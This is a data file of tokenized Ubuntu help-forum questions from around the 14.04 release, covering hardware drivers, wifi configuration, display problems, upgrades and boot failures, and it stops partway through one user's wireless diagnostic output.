453758	poor battery life ux32vd ubuntu 14.04 with optimus 4000/620m	i 'm running ubuntu 14.04 ux32vd laptop and am getting only 2 hours of battery life where as on my windows partition i get 6 . i 'm using a zenbook ux32vd with intel 4000/nvidia 620m . i have the nvidia-331 / nvidia-prime 0.5 driver installed . i tried installing tlp and still have terrible battery life ( no noticeable improvement ) . is there a way to check if the nvidia card is still running in the background ? in nvidia-settings i have it specified to use intel graphics , but i 'm wondering what is killing the battery ? i have the lighting down to 30 % . i 'm running the flux 2013 script and default applications , along with chrome . thanks !
453762	github for windows , but for ubuntu	is there a version of github for windows or github for mac that is meant for ubuntu/linux ?
453763	14.04 parallels and virtualbox resolution issues	i recently installed ubuntu 14.04 on parallels and virtualbox . been trying multiple methods to fixing the resolution with no luck . i am running both these vm 's on my mid-2013 mbpr : intel iris : chipset model : intel iris type : gpu bus : built-in vram ( total ) : 1024 mb vendor : intel ( 0x8086 ) device id : 0x0a2e revision id : 0x0009 displays : color lcd : display type : retina lcd resolution : 2560 x 1600 retina : yes i have tried editing my xorg.icof file ( never did exist in /etc/x11/ in the first place ) - /etc/x11/xorg.conf does n't exist ? tried making sure i added the refresh rate to the file , usually leads to the system not letting me login in . the resolution seems great when i 'm installing ubuntu for the first time . but the moment i reboot it and it logs into my user . it 's stuck in 640x320 . it 's hard to even get around and change settings since i ca n't see but a fourth of pop-up windows .
453765	is there a way to switch users from the new lock screen ?	i upgraded to 14.04 from 13.10 and i 'm having a couple issues with the lock behavior ( ctrl+alt+l ) . in 13.10 the monitor would go into power save and then when the screen turned back on i was able to switch users . in 14.04 , the monitor stays on and there does n't appear to be a way to switch users without the user that locked it logging in and the logging out . is there a way to switch users from the new lock screen ? is there a way to turn the screen off upon locking ?
453767	usb microsoft mouse does n't work after upgrade to 14.04	i am using lenovo x201 running with ubuntu . after upgrade to 14.04 my microsoft usb mouse does not work . : ~ $ lsusb | grep mouse bus 002 device 021 : id 045e:00cb microsoft corp . basic optical mouse v2.0 it looks like this mouse was detected but do n't know why does n't work ( no response ) . currently , only ibm trackpoint ( touchpad ) work . may i know how to fix it ? thanks ! !
453768	ubuntu 14.04 freeze constantly !	i installed ubuntu 14.04 yesterday on my before using win 8.1 laptop using usb . i 've installed drivers for nvidia and other default programs like chromium , pidgin , new version of libreoffice , spotify and bitdefender ! now everything freezes after a certain time after logging in to the system . always around 5-10 min depending on what i 'm doing . no program specific since it may freeze whatever i 'm doing . only thing working is alt+sysrq reisub or an cold hard system shutdown ... ! what should i do ? im using asus n43sn ... would love to link but there site like my laptop is not working properly ! nvidia gforce gt 550m cuda 1gb intel i5 note : i can close the lid . in this case it does logout me and i 'm free to login again , but it still freezes after 5-10 min ...
453770	using cd command to navigate directories in ubuntu which have special characters	when i want to navigate into directories having special characters in their names i get an error message . for example : aman @ desktop : ~/aman $ cd ! ) e $ ! gn & ( reate bash : ! : event not found aman @ desktop : ~/aman $ here ! ) e $ ! gn & ( reate is the directory name where i want to navigate . how to rectify this error ? how to use cd command to navigate directories in ubuntu having directory name with special characters ?
453772	start up in lubuntu 14.04	when i turn my laptop on it automatically says [ minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename . ] grub > how can i fix this if fixing it is possible
453779	is it possible to have an always visible menu bar for nautilus or restore the default full gear button menu , in 14.04	the general solution which involves uninstalling various appmenu packages does not work for nautilus , its menu bar is still missing . it does get a gear drop down menu button on the tool bar , but that menu is missing many menu items ( e.g . preferences ) if a menu bar is not part of the default nautilus interface , then how do you at least get the full gear button menu .
453781	icaclient on kubuntu 14.04 x64	has anybody been able to install the icaclient on ubuntu/kubuntu x64 successfully ? please respond with steps . greatly appreciated .
453782	rsat not connecting when trying to administer samba domain on ubuntu	i have created a domain server on ubuntu using samba . i have managed to connect to this domain using my windows 7 pro laptop . the guide i used to configure the samba domain on ubuntu ( http : //www.youtube.com/watch ? v=rf7hk8qwt1q ) suggested using windows remote server administration tools to create domain users etc . when i try and launch the `` active directory users and computers '' utility i get the message `` naming information can not be located for the following reason : the server is not operational . '' this seems to be sporadic as i have launched it successfully once before . i am running ubuntu 12.04 and samba 4.1.7 . any thoughts would be appreciated . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > i just resolved this , i needed to make the user i was logged in under a member of the administrators group .
453784	vsftpd installation not working on virtual server as of 14.04	the process i have used for installing vsftpd since 12.04 no longer works . i get the error stop : unknown instance when restarting the service . i believe this means the configuration is wrong , but i can not track down the issue . i 'm having this problem on a virtual server . additionally , running sudo vsftpd results in 500 oops : munmap as noted by @ beltran . acquire root privileges sudo -s install vsftpd and libpam-pwdfile apt-get install vsftpd libpam-pwdfile edit vsftpd.conf mv /etc/vsftpd.conf /etc/vsftpd.conf.bak vim /etc/vsftpd.conf copy and paste the following lines . allow_writeable_chroot=yes anonymous_enable=no chroot_list_enable=yes chroot_local_user=yes guest_enable=yes guest_username=vsftpd hide_ids=yes listen=yes local_enable=yes local_umask=022 local_root=/var/clients/ $ user nopriv_user=vsftpd pasv_address=127.0.0.1 pasv_enable=yes pasv_min_port=65000 pasv_max_port=65100 port_enable=yes user_sub_token= $ user seccomp_sandbox=no virtual_use_local_privs=yes write_enable=yes register virtual admin apt-get install apache2-utils mkdir /etc/vsftpd htpasswd -cd /etc/vsftpd/ftpd.passwd admin vim /etc/vsftpd.chroot_list add 1 line for the admin user admin configure pam mv /etc/pam.d/vsftpd /etc/pam.d/vsftpd.bak vim /etc/pam.d/vsftpd copy and paste these 2 lines . auth required pam_pwdfile.so pwdfile /etc/vsftpd/ftpd.passwd account required pam_permit.so create a local user without shell access useradd -- home /home/vsftpd -- gid nogroup -m -- shell /bin/false vsftpd create root directory and give local user proper access . mkdir /var/clients chmod -r 755 /var/clients chown -r vsftpd : nogroup /var/clients register jailed virtual users ( initially , i skip this step ) htpasswd -d /etc/vsftpd/ftpd.passwd { user_name } mkdir /var/clients/ { user_name } restart service service vsftpd restart
453785	large text button in universal access turns itself on after reboot - ubuntu 14.04	i have just recently clean installed ubuntu 14.04 on my xps13-9333 , everything seems to be working well apart from one thing that 's bothering me . the text on the menu bar or the text in the folders often becomes large after i restarted the laptop . it took me a while to work out that this is because the large text option in universal access under system settings is turning itself on . turn it off manually helps occasionally , but every now and then after rebooting the text will again become large . is there anyway i can fix this , i would appreciate it a lot ? thanks a lot !
453787	access guest ubuntu 's folder from host mac os x ?	is it possible to access the folders inside my guest ubuntu 14.04 from my host mac os x ? i 've found some articles stating that it 's possible to do this kind of `` reverse-sharing '' for windows host using samba , but ca n't seem to find the instructions for mac os x host .
453788	epiphany game does not run in a suitable window size ?	this screenshot show the situation : as you see , i ca n't change window size to have a whole view of game ! is it a bug in game or it 's related to ubuntu or somthing else ?
453789	can not add keyboard layouts and get a blank dialog on ubuntu 12.04	i 'm a new user ( ubuntu 12.04 clean install ) and now have some troubles with keyboard layouts . the real problem is that i have to use a few languages for typing and i 'm not able to add them . i used system settings > language support and installed languages . so i go back to keyboard layout , click on `` + '' and after every attempt i get a blank dialog window . keyboard layout options also appears blank . i 've used the following troubleshooting : i reinstalled language-selector-gnome reboot ( a few times really ) i used dconf-editor and changed layout value desktop/gnome/peripherals/kbd/layouts ( set to 5 ) . the default one was empty . installed the latest updates . nothing helps . alternative keyboard layouts do not appear . i have xneur installed but when i try to launch it the icon does n't appear in systray . though actually i do not know if it 's related to keyboard layouts problem . is there something else that i should change ? please advice .
453792	firebird classic , inetd and occasional refused connection	i have a newly installed ubuntu 12.04 64bit server with firebird classic 2.5 installed using the ubuntu repositories . inetd was automatically installed . we have a custom app accessing the database via `` 127.0.0.1 : /var/lib/firebird/2.5/data/test.dbf '' and generating html pages from queries . we noticed that occasionally a query would fail and reloading the page it would be successful . the firebird log is not reporting any errors , neither is the syslog . i wrote a little script to try and simulate the issue and found i could sometimes not connect to the database when using the database location as 127.0.0.1 : /var/lib/firebird/2.5/data/test.dbf but not when i used /var/lib/firebird/2.5/data/test.dbf there was no issues . i am doing all the following tests while our application is still running . the script does a select with `` group by '' of all the data on one of the tables and runs for about 2 seconds . i then run this script 10 times consecutively . the first time i ran the script , the first 7 times worked correctly and then the last 3 selects gave the following error : statement failed , sqlstate = 08004 connection rejected by remote interface after line 0 in file test.sql use connect or create database to specify a database use connect or create database to specify a database i ran the test multiple times and about 10 % time the time i had this result . i have been search the web for this issue and have not found a exact same issue . i have rechecked my configs and must be missing something . versions and configs : linux mitel-tms 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 16:19:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux firebird tcp/ip server version li-v2.5.1.26351 firebird 2.5 /etc/inetd.conf : gds_db stream tcp nowait firebird /usr/sbin/tcpd /usr/sbin/fb_inet_server /etc/firebird/firebird.conf : this is the only setting i added the conf , but i have removed it in the meanwhile to test if it was not causing my issues . # remotebindaddress = 127.0.0.1 anyone that can assist with something that i might have missed ?
453793	remapping caps lock in 14.04 trusty tahr	i 've seen a number of questions that point to a gui menu to remap caps lock , but that menu seems to be gone in 14.04 . am i just not finding it , or is it really gone ? i know you can use xkbmap to remap it , but i 'm not really sure how to make that persist . edit i 've tried the suggestions on the accepted answer for this question , but nothing seems to be working . from what i can tell , the .xinitrc file does n't ever seem to be sourced . is there some other work around that might fix this for me ?
453796	in netstat , i 'm getting close_wait for ipp . is that supposed to happen ?	netstat is giving me proto recv-q send-q local address foreign address state tcp6 1 0 ip6-localhost:40526 ip6-localhost : ipp close_wait i do n't have a wireless printer and have n't connected my computer to any printer whatsoever . is this a normal response ?
453797	error connecting to windows terminal server via network boot	i am currently trying to load a windows terminal server screen instead of a ubuntu screen , i keep receiving a blank black screen with only the cursor visible or an error screen with a lengthy busybox v.1.85 error which i am not sure of . i created a file in pathway ; - pico /var/lib/tftpboot/ltsp/amd64/lts.conf within here i then added the following ; - [ default ] screen07 = rdesktop rdp_server = `` 192.168. ? ? ? . ? ? '' i have configured the dhcp server etc and test machines but the only part i am stuck on is loading the actual ip address i inputted into the file above to run at network boot . can anyone also explain what screen07 represents . thanks .
453799	how do i change icon resorces for chrome browser ?	i want to know how i can get the oxygen-transparent minimize , maximize and close buttons to display for the chrome browser instead of their generic linux buttons , as it looks very different from the rest of my system and i want the experience to be consistent . i have tried using the option to use system title bar and such , but that does not allow full maximise and does n't look like as much of a clean integration as i want . i want to know how i can find and edit the icon resources within the .deb file , or how to intercept the resource request and inject other resources , something like the xposed framework on android . i also want to have the transparent+blur that i get with oxygen transparent with the rest of the system , though that is not the main goal .
453801	ubuntu 14.04 64bit - computer shuts down by itself	after i installed ubuntu 14.04 64-bit on my lenovo thinkpad t61 today , i could boot up ubuntu without problem but after i run the software center , additional driver , or firefox , the computer will shut itself down . could it be possible that the 64-bit version is not compatible ? i used to use 12.04 32-bit without any problems .
453803	my android device can not connect to made wifi hotspot	first i created a wifi hot spot for android successfully . its being detected but can not connect , its getting stuck at obtaining ip address . why ? please help .
453804	unison bidirectional sync - problem with set permissions ?	i have setup unison to sync a folder on two computers . on the first one c1 , the folder is inside home . on the second one c2 , the folder is on a partition , which is mounted automatically at startup . sincronization works , if the files change on c2 and are transferred to c1 's home folder . when i manipulate the files on c1 , they are not syncronized to the partition on c2 . in unison window asks for `` prop ? prop '' . afterwards files are not syncronized . how do i have to set the permissions correctly ? actual permissions are : c1 folder owner = user ( create and delete ) group = user ( access ) others = ( access ) c2 folder owner = root ( create and delete ) group = root ( create and delete ) others = ( create and delete ) the partition on c2 has to be available for several user accounts . thanks and greetings
453805	why do-release-upgrade does not show 14.04 even if it was officially released ?	i do have 12.04 lts and hearing that 14.04 lts was released i ( wrongly ) assumed that i will be able to upgrade machines using the standard distribution upgrade path . still it seems that 'sudo do-release-upgrade ' does not see any new release . why it does n't show it and when is this going to be visible ? obviously , i do not want to force the usage of development / unstable versions . also , considering the 14.04 was released on april 17 , why it was released when it was not considered `` stable '' yet ? ... there is something in the release process that does n't make sense to me : p
453811	right to left languages in libreoffic	how to write both english and another language which is right to left in a line . no more talk they know what i am looking for : - ( but if you persist i say when you type a language which is right to left and then change to engliglish the display format is not correct . ps : i use libreoffic on 14.04
453817	flash do n't work lubuntu 14.04	i had installed lubuntu 14.04 and flash do n't work when i open with firefox a video of youtube or spotify web client or yes.fm i can see that the addon is ok : shockwave flash version 11.2.202.350 my system : processor : pentium iii ( coppermine ) memory : 507mb ( 241mb used ) operating system : ( lubuntu 14.04 trusty tahr ) web browser : firefox 28.0
453818	upgrade to 14.04 from 13.10 not working	when i press the upgrade button after ubuntu shows the upgrade is available . i enter my pass word and press authenticate and then the box goes away , but nothing happens after that point . i am running on wifi is this an issue ? john
453821	install i386 program on samsung arm chromebook	i have installed ubuntu 12.04 with crouton on my samsung arm chromebook for the sole purpose of installing either foxit pdf or adobe reader . unfortunately , both of these are i386 architecture . is there any way to get round this ? i have tried to find and install ia32-libs but all versions tell me i have the wrong architecture . i know that there are alternative pdf readers for ubuntu , but none of them have adequate search functions akin to adobe readers 'advanced search ' feature , where results are displayed in a list in context . any help would be greatly appreciated .
453822	ecsusa a790gxm-a vga driver	using ubuntu 12.04.4 lts 64bit , on my escusa ( elite group ) motherboard model = a790gxm-a ( version 1.0 ) ubuntu 64 bit 12.04.4 lts worked great , even 11.04 worked better with hdmi , but 12.04.4 lts did not recognize hdmi , nor 13.10 and now i have ubuntu 14.04 lts and it does work with my hdmi . damn ati hd3300 graphics are integrated . i try the flgrx driver , various versions , and no good , no control , have to trick the desktop to run a script and set a resolution on my vga-0 since i use that more for graphics . i have no drive to run 3d graphics , at least full screen , just window mode , with vga memory , i can see my media videos fine , even through the gl extension full screen . please advise what i can do with ati for my motherboard a790gxm-a , with integrated graphics , radeon hd 3300
453823	is there an upgrade procedure from 12.04 lts to 14.04 lts	i have tried the standard : apt get install update-manager-core do-release-upgrade but this does not seem to get it to 14.04 lts . are there other steps that i am missing ?
453824	retrieve data from ubuntu	i had a dual boot windows 7 and ubuntu ( on two separate hard drives ) that worked fine until i had to reinstall windows 7 . after the install i was unable to access the ubuntu os . i just need to know is it possible to get the data from the ubuntu drive like you can with a windows drive ? i can plug up the drive with windows , open the desired folders and copy/move the data somewhere else .
453825	ubuntu shuts down for no reason	up until 2 days ago ubuntu 12.04 was going simply great , then the update manager prompted for some updates and i continued as usual . after that i continued to use the computer for few more hours then i restarted it but seems dead . i unplugged the power cable , waited about 30 sec and restarted , and it does work , however with my great surprise once it reaches the grub screen and i select the os i want ( i have only ubuntu 12.04 on this system ) the computer shuts down and i am unable to restart it . i have to unplug the power cable and wait a few seconds until i can restart it . if i choose the second option , it does not shutdown ; but after a zillion of lines it takes me to a new window where i can chose what option i want . i tried to check the file system and it was ok ; if i click `` repair broken package '' and i agree to upgrade i get numerous lines says `` error unable to fetch ... . '' . if i chose low graphic mode i am taken to a second window but whatever is the option that i chose i get a blank screen which stays there for several minutes , with a dash blinking on the top left corner of the monitor but nothing happens . i am currently working with a live cd but and i wonder what would be the best way to proceed . can i fix it from the live cd ? how ?
453826	gnome flashback configuration problem	everyone ! ! ! i 'm using ubuntu 14.04 . i 'm having a problem with gnome flashback , both gnome flashback ( compiz ) and gnome flashback ( metacity ) . here 's the problem . gtk2 apps look like windows 98 . gtk3 apps use ambiance theme . the font is antialiased . the font is sans 10 with full hinting and no subpixel . i would like to change them , so i installed 'gnome-tweak-tool ' . then i ran it , went to appearance tab , made the changes but only metacity theme gets changed : no change in gtk and icon themes . i went to fonts tab , changed them too but only window title font is changed . i tried to logout and log back in and same problem is here . this did n't happen before ; it happened suddenly . i tried to completely remove gnome flashback and reinstall it , but the problem is still there . how can i fix it ? cheers .
453831	help ! online upgrade from 12.04 to 14.04 stuck	i was trying to upgrade my lenovo t500 laptop from kubuntu 12.04 lts to kubuntu 14.04 lts . fired up the upgrade process , and finally after downloading a zillion packages the upgrade got going , only to get stuck ... it has been stuck for hours on : installing the upgrades- > unpacking subversion last lines of error messages : glib-gobject-critical ** : /build/buildd/glib2.0-2.32.4/./gobject/gtype.c:2722 : you forgot to call g_type_init ( ) at /usr/lib/perl/5.18/dynaloader.pm line 207 . glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed at /usr/lib/perl/5.18/dynaloader.pm line 207 . i do n't care much about subversion anymore , i use git now ; i do n't care if subversion ends up in a bad state and i have to remove it ... i just want the upgrade to continue , and hopefully complete . any ideas ? ? ? ? thanks , luis
453836	nautilus not worlking ... window is flipping	intializing nautilus-pastebin extension ... sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed ** ( nautilus:2842 ) : critical ** : nautilus_menu_provider_get_background_items : assertion 'nautilus_is_menu_provider ( provider ) ' failed ** ( nautilus:2842 ) : critical ** : nautilus_menu_provider_get_background_items : assertion 'nautilus_is_menu_provider ( provider ) ' failed totem-video-thumbnailer could n't open file 'file : ///home/symbol/desktop/searching % 20with % 20costs-lec03.flv' ( nautilus:2842 ) : gdkpixbuf-critical ** : gdk_pixbuf_loader_close : assertion 'gdk_is_pixbuf_loader ( loader ) ' failed ( nautilus:2842 ) : gdkpixbuf-critical ** : gdk_pixbuf_loader_get_pixbuf : assertion 'gdk_is_pixbuf_loader ( loader ) ' failed sys:1 : warning : g_object_unref : assertion 'g_is_object ( object ) ' failed segmentation fault ( core dumped )
453840	unity not working after changes using compiz config	i have made some changes to effects using compiz config , however ever since doing this the launcher , taskbar , and borders around windows has disappeared . i have tried reinstalling unity and compiz through terminal ( via alt-f1 ) , but to no avail , any advice would be greatly appreciated .
453841	how to remove lubuntu-desktop from ubuntu 14.04 lts	i have installed lubuntu-desktop in my ubuntu 14.04 lts . now i want to get pure ubuntu . how can i revert back to ubuntu only ? note : i have searched in the google and found solutions for 12.04 / 12.10 . but have not found any solution for ubuntu 14.04 lts yet . thats why i asked here .
453846	booting problems after update	yesterday i updated my laptop ( lenovo thinkpad t440p ) to ubuntu 14.04 . afterwards i restarted the laptop , but the operating system would n't start . i can '' t get into the booting menu to choose ubuntu ( or windows 7 ) , i come directly to a black screen showing me error : file '/boot/grub/i386-pc/normal.mod ' not found . entering rescue mode ... grub rescue > _ after typing ls , i get the following output : ( hd0 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) and after ls ( hd0 , msdos6 ) just `` filesystem is unknown . '' using the other partitions give me the same result . i tried to boot from a ubuntu-live-dvd and a ubuntu-live_usb , but it says * starting recovery options if display manager fails to start [ fail ] * stopping recovery options if display manager fails to start [ ok ] [ 122.775345 ] squashfs error : zlib decompression failed , data probably corrupt [ 122.775371 ] squashfs error : squashfs_read_data failed to read block 0x1eef27d9 ... so i ca n't even start the live-version . strange . one thing i tried : i installed super grub disk onto a usb-drive and tried to boot with it , but i always get the error message findf /etc/fstab error 15 : file not found now i do n't know further . can anyone help me please ?
453848	how to create a ubuntu 12.04 vm for django deployment ?	i am planning to deploy my django application as a vm in an intranet environment for a company . i am using virtualbox . is there any official document on how to create ubuntu 12.04 vm which can auto start all the required services like web server , database , ssh and other services when the vm is started ? this makes the site to be live immediately . kindly help . i am new to ubuntu server .
453849	java & flash problem chromium lubuntu 14.04	i am running lubuntu 14.04 lts , i have installed icedtea and flash player , they both work in firefox but i can not seem to make them work in chromium . i tried purging chromium and java and flash then reinstall them but still they don`t work . any ideeas ?
453850	change username in print que	hi i am using my ubuntu 13.04 to print to my workplace . everything works fine , the printer prints ok but the username shown in the print queue of the printer is the one i have on my laptop and not my actual name . i do not wish to change my username on my laptop is there any way that i can change this to my last name ? i have tried going through the settings on printers and on my cups through http : //localhost:631/ but i could n't find and option . thanks
453851	startup script problem	i am new to ubuntu.i want to run this script every time my system reboots.is there a way to do that ? thanks in advance for help . # ! /bin/bash # fix resolution problem xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 - hsync +vsync xrandr -- addmode vga1 1440x900_60.00
453852	vim stopped accepting a keyboard command	for some reason as of 3 days ago my vim stopped accepting ctrl-x from me . i have this combo mapped to copy to x clipboard . it worked perfectly before 3 days ago . i have not changed my .vimrc file at all in that time nor upgraded any app/console . vmap < c-x > `` +yi this worked perfectly up till now for almost a year since i created this mapping . this is of course in visual mode . if in edit mode i hit the same key combo then the ^x mode comes up . so i know the terminal is letting the ctrl through .
453853	eclipse ca n't find java after upgrade to 14.04	after upgrade to ubuntu 14.04 eclipse 3.8 ca n't find any installed java vm . i have the sun jdk 1.7 and the openjdk7 installed . i have tried modifying the eclipse.ini to point it to one of the installed java vms : -vm /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java this lets eclipse start but it does not recognize any java . -vm /usr/java/jdk1.7.0_21/bin/java with this eclipse crashes at startup with the following error message : jvm terminated . exit code=1 /usr/java/jdk1.7.0_21/bin/java pointing to the java files in the respective jre directories has the same results . any ideas ? update : i have updated the oracle java to 1.8 . now it does n't crash eclipse anymore and behaves exactly the same as openjdk7 . eclipse does n't see either .
453856	auth_failure when connecting to wireless network in ubuntu 14	i installed ubuntu and i 've been working on this for a while now and i really need some help bad . i setup a realtek rtl8192e windows xp driver on ubuntu using ndiswrapper and configured wpa_supplicant . i followed these tutorials configure the rtl8190 with ndiswrapper : http : //ubuntuforums.org/showthread.php ? t=1433401 configure wpa_supplicant : http : //ubuntuforums.org/showthread.php ? t=263136 i also ran a wireless script for troubleshooting ( toward the end ) here 's my wpa_supplicant.conf file : ctrl_interface=/var/run/wpa_supplicant # ap_scan=2 network= { ssid= '' 2wire201 '' scan_ssid=1 proto=wpa rsn key_mgmt=wpa-psk pairwise=ccmp tkip group=ccmp tkip psk=2efdade6c94ad65fda3e453879cf0a81a8cd09ec3fe1886154c0ba0c35478d13 } my router is configured to accept wpa-tkip and wpa2-aes so why am i getting this message when i type this : sudo wpa_supplicant -dwext -iwlan0 -c/etc/wpa_supplicant.conf and i get this : successfully initialized wpa_supplicant ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument wlan0 : trying to associate with 60 : c3:97 : b4:73 : f9 ( ssid='2wire201 ' freq=2452 mhz ) wlan0 : associated with 60 : c3:97 : b4:73 : f9 wlan0 : ctrl-event-disconnected bssid=60 : c3:97 : b4:73 : f9 reason=0 wlan0 : trying to associate with 60 : c3:97 : b4:73 : f9 ( ssid='2wire201 ' freq=2452 mhz ) wlan0 : associated with 60 : c3:97 : b4:73 : f9 wlan0 : ctrl-event-disconnected bssid=60 : c3:97 : b4:73 : f9 reason=0 wlan0 : trying to associate with 60 : c3:97 : b4:73 : f9 ( ssid='2wire201 ' freq=2452 mhz ) wlan0 : associated with 60 : c3:97 : b4:73 : f9 wlan0 : ctrl-event-disconnected bssid=60 : c3:97 : b4:73 : f9 reason=0 wlan0 : trying to associate with 60 : c3:97 : b4:73 : f9 ( ssid='2wire201 ' freq=2452 mhz ) wlan0 : associated with 60 : c3:97 : b4:73 : f9 wlan0 : ctrl-event-disconnected bssid=60 : c3:97 : b4:73 : f9 reason=0 wlan0 : ctrl-event-ssid-temp-disabled id=0 ssid= '' 2wire201 '' auth_failures=1 duration=10 results of wireless troubleshooting script # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux anthony-vm 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 00:19.0 ethernet controller [ 0200 ] : intel corporation 82578dc gigabit network connection [ 8086:10f0 ] ( rev 05 ) subsystem : intel corporation device [ 8086:0000 ] kernel driver in use : e1000e 03:01.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8190 802.11n pci wireless network adapter [ 10ec:8190 ] subsystem : realtek semiconductor co. , ltd. rtl8190 802.11n pci wireless network adapter [ 10ec:8190 ] kernel driver in use : ndiswrapper 03:03.0 firewire ( ieee 1394 ) [ 0c00 ] : texas instruments tsb43ab22a ieee-1394a-2000 controller ( phy/link ) [ iohci-lynx ] [ 104c:8023 ] # # # # # lsusb # # # # # bus 002 device 004 : id 046d:0819 logitech , inc. webcam c210 bus 002 device 002 : id 058f:6362 alcor micro corp . flash card reader/writer bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 046d : c068 logitech , inc. g500 laser mouse bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 10f5:0230 turtle beach bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 046d : c22d logitech , inc. g510 gaming keyboard bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # auto lo iface lo inet dhcp pre-up wpa_supplicant -bw -dwext -wlan0 -c/etc/wpa_supplicant.conf post-down killall -q wpa_supplicant # # # # # iwconfig # # # # # wlan0 ieee 802.11g essid : off/any mode : managed frequency:2.412 ghz access point : not-associated bit rate:65 mb/s tx-power:20 dbm sensitivity=0/3 rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ndiswrapper state : disconnected default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points 2wire201 : infra , < mac address removed > , freq 2452 mhz , rate 54 mb/s , strength 75 wpa wpa2 lisajae : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 52 wpa2 att346 : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 50 wpa wpa2 home-1842 : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 52 wpa wpa2 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # no way to aquire root rights found . # # # # # iwlist channel # # # # # wlan0 14 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 14 : 2.484 ghz current frequency:2.412 ghz ( channel 1 ) # # # # # lsmod # # # # # ndiswrapper 283985 0 # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/updates/dkms/ndiswrapper.ko license : gpl version : 1.59 description : ndis wrapper driver author : ndiswrapper team < ndiswrapper-general @ lists.sourceforge.net > srcversion : dc1efd919fdf2db80d424c6 depends : vermagic : 3.13.0-24-generic smp mod_unload modversions parm : if_name : network interface name or template ( default : wlan % d ) ( charp ) parm : proc_uid : the uid of the files created in /proc ( default : 0 ) . ( int ) parm : proc_gid : the gid of the files created in /proc ( default : 0 ) . ( int ) parm : debug : debug level ( int ) parm : hangcheck_interval : the interval , in seconds , for checking if driver is hung . ( default : 0 ) ( int ) parm : utils_version : compatible version of utils ( read only : 1.9 ) ( charp ) # # # # # modules # # # # # lp rtc ndiswrapper # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x8086:0x10f0 ( e1000e ) subsystem== '' net '' , action== '' 